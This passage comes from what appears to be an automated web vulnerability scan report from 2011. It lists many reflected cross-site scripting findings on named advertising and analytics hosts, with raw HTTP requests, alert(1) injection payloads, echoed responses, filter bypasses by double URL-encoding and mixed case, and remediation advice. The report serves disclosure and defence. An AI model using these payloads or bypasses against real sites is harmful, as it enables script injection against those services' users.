Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633
Response
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 00:52:07 GMT
Date: Sat, 17 Sep 2011 00:52:07 GMT
Content-Length: 1235
Connection: close
The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 4342b<script>alert(1)</script>a0dd5801e26 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=4342b<script>alert(1)</script>a0dd5801e26&c15=&tm=738115 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633
Response
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 00:52:08 GMT
Date: Sat, 17 Sep 2011 00:52:08 GMT
Content-Length: 1235
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3c73"><script>alert(1)</script>e1b769851e7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:41:26 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 380
Content-Type: text/html
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 335ab"><script>alert(1)</script>facc901f053 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:41:40 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 463
Content-Type: text/html
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32bc8"><script>alert(1)</script>895c80335e5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:41:54 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 463
Content-Type: text/html
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71dff"><script>alert(1)</script>b41d32a101b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:42:08 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 372
Content-Type: text/html
The value of the companion request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9bf9</script><script>alert(1)</script>cc94f26ced5 was submitted in the companion parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the companion request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 431a4"><script>alert(1)</script>498ee9cb580 was submitted in the companion parameter. This input was echoed as 431a4\"><script>alert(1)</script>498ee9cb580 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4cfbf%2527%253balert%25281%2529%252f%252f04fb34becb4 was submitted in the page parameter. This input was echoed as 4cfbf';alert(1)//04fb34becb4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the page request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The value of the page request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97e2b"><script>alert(1)</script>d1318e1e89 was submitted in the page parameter. This input was echoed as 97e2b\"><script>alert(1)</script>d1318e1e89 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the position request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2cb2a</script><script>alert(1)</script>60f4c826daf was submitted in the position parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the position request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29a42"><script>alert(1)</script>f1bf5dd16e2 was submitted in the position parameter. This input was echoed as 29a42\"><script>alert(1)</script>f1bf5dd16e2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the query request parameter is copied into the HTML document as plain text between tags. The payload a4d93<script>alert(1)</script>c705977927c was submitted in the query parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the companion request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8eb5"><script>alert(1)</script>ac50390d5f8 was submitted in the companion parameter. This input was echoed as b8eb5\"><script>alert(1)</script>ac50390d5f8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the companion request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 492df</script><script>alert(1)</script>3d2d1682c3d was submitted in the companion parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the page request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c1c0"><script>alert(1)</script>6c55ca82c3b was submitted in the page parameter. This input was echoed as 6c1c0\"><script>alert(1)</script>6c55ca82c3b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8bca3%2527%253balert%25281%2529%252f%252f54aa045dd55 was submitted in the page parameter. This input was echoed as 8bca3';alert(1)//54aa045dd55 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the page request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The value of the position request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d9a4"><script>alert(1)</script>5a6cecf4080 was submitted in the position parameter. This input was echoed as 4d9a4\"><script>alert(1)</script>5a6cecf4080 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the position request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95ffc</script><script>alert(1)</script>2d13a9c6857 was submitted in the position parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 7b357<script>alert(1)</script>dcde2ff62ac was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the callback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 39203%3balert(1)//7c31c657ad7 was submitted in the callback parameter. This input was echoed as 39203;alert(1)//7c31c657ad7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 5a4d3<script>alert(1)</script>798bcc7a568 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the 3rd AMF string parameter is copied into the HTML document as plain text between tags. The payload e4004<script>alert(1)</script>f95237046cf was submitted in the 3rd AMF string parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the id request parameter is copied into the HTML document as plain text between tags. The payload ccca6<script>alert(1)</script>b631027d26d was submitted in the id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 16faf<script>alert(1)</script>25da9310260 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 9af12<script>alert(1)</script>c3b46f05e43 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 91d0b<script>alert(1)</script>b9789a4c38 was submitted in the c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload fed22<ScRiPt>alert(1)</ScRiPt>002ba52e113 was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
The value of the iplc request parameter is copied into the HTML document as plain text between tags. The payload b2beb<ScRiPt>alert(1)</ScRiPt>9888b1420ce was submitted in the iplc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
The value of the plc request parameter is copied into the HTML document as plain text between tags. The payload a6613<ScRiPt>alert(1)</ScRiPt>b83e4cf829 was submitted in the plc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
The value of the zi request parameter is copied into the HTML document as plain text between tags. The payload 291e4<ScRiPt>alert(1)</ScRiPt>643b283f84c was submitted in the zi parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 57523'%3balert(1)//761ebfa4333 was submitted in the $ parameter. This input was echoed as 57523';alert(1)//761ebfa4333 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=951:collective728x9057523';alert(1)//761ebfa4333,collective728x90ddc3c';expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,14:951,2,14:951,2,0:0,2,14:951,0,14:933,56,15:951,2,15dd3b5ba9ef00e97d324cdbd6;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=91:90:10:10:10:None:None;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "aa1b9a-8952-4accb58ae5040"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=18
Expires: Sat, 17 Sep 2011 01:50:08 GMT
Date: Sat, 17 Sep 2011 01:49:50 GMT
Content-Length: 2676
Connection: close
// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.
var z11=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=2;var zzPat='collective728x9057523';alert(1)//761ebfa4333,collective728x90ddc3c'';var zzCustom='';var zzTitle=''; if(typeof zzStr=='undefined'){ var zzStr="q=collective728x9057523';alert(1)//761ebfa4333,collective728x90ddc3c';z="+Math.random();}
The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2cd0e"-alert(1)-"31d922bac00 was submitted in the $ parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=951:collective728x902cd0e"-alert(1)-"31d922bac00,collective728x9016082%22%3b2f389a5ae83,collective728x9016082";expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,14:951,2,14:951,2,0:0,2,14:951,0,14:933,56,15:951,2,15dd3b5ba9ef00e97d324cdbd6;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=89:88:10:10:10:None:None;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "aa1b9a-8952-4accb58ae5040"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=18
Expires: Sat, 17 Sep 2011 01:50:08 GMT
Date: Sat, 17 Sep 2011 01:49:50 GMT
Content-Length: 2754
Connection: close
// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.
var z11=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=2;var zzPat='collective728x902cd0e"-alert(1)-"31d922bac00,collective728x9016082%22%3b2f389a5ae83,collective728x9016082"';var zzCustom='';var zzTitle=''; if(typeof zzStr=='undefined'){ var zzStr="q=collective728x902cd0e"-alert(1)-"31d922bac00,collective728x9016082%22%3b2f389a5ae83,collective728x9016082";z="+Math.random();}
The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c82c2'%3balert(1)//7d572232822 was submitted in the q parameter. This input was echoed as c82c2';alert(1)//7d572232822 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=951:284b8'-alert(1)-'04109d7f66c,b909c%27%3ba372b7aa248,collective728x90,b909c'$0:collective728x90;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,14:951,2,14:951,2,0:0,2,14:951,0,14:933,56,15:951,2,15dd3b5ba9ef00e97d324cdbd6;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=77:76:10:10:10:None:None;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "aa1b9a-8952-4accb58ae5040"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=23
Expires: Sat, 17 Sep 2011 01:50:08 GMT
Date: Sat, 17 Sep 2011 01:49:45 GMT
Content-Length: 2750
Connection: close
// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.
var z11=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=2;var zzPat='c82c2';alert(1)//7d572232822,284b8'-alert(1)-'04109d7f66c,b909c%27%3ba372b7aa248,collective728x90,b909c'';var zzCustom='';var zzTitle=''; if(typeof zzStr=='undefined'){ var zzStr="q=c82c2';alert(1)//7d572232822,284b8'-alert(1)-'0 ...[SNIP]...
The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 569f5<script>alert(1)</script>cbb22875fc7 was submitted in the uid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da1f4"-alert(1)-"f4229a086fa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjsi/dcda1f4"-alert(1)-"f4229a086fa/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=7A00B96A0D964F453E5BD8D5810F10FB; Path=/
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:07:59 GMT
Connection: close
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2023a"-alert(1)-"ff30b4aa7a4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjsi/dc/103392023a"-alert(1)-"ff30b4aa7a4/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A971275997FA7630761B5092947B1A05; Path=/
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:08:00 GMT
Connection: close
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db706"-alert(1)-"9cd6414e8aa was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjsi/dc/10339/128628db706"-alert(1)-"9cd6414e8aa/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A049BAB0531C29E6EC384F93AA842C69; Path=/
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:08:00 GMT
Connection: close
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 114c3"-alert(1)-"fc47482de42 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjsi/dc/10339/128628/adi114c3"-alert(1)-"fc47482de42/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1DB5C21D80F320C04F41B642CF20125A; Path=/
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:08:01 GMT
Connection: close
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b6a7"-alert(1)-"c3bd8bd988d was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA6b6a7"-alert(1)-"c3bd8bd988d/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1DCCDAFA24DD21FDF6463237374426AC; Path=/
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:08:02 GMT
Connection: close
The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 640d2"-alert(1)-"0338569564a was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9640d2"-alert(1)-"0338569564a;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=6B61580EFD1DC69FFF19E25E19111CA1; Path=/ Content-Type: text/html Date: Sat, 17 Sep 2011 01:08:01 GMT Connection: close
4.112. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77df7"-alert(1)-"55e8aaf402d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955&77df7"-alert(1)-"55e8aaf402d=1 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=81D38C248A8FC0D3AE4AEA54D3D89A0E; Path=/
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:07:58 GMT
Connection: close
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6da0d"-alert(1)-"9d189a7cf3d was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
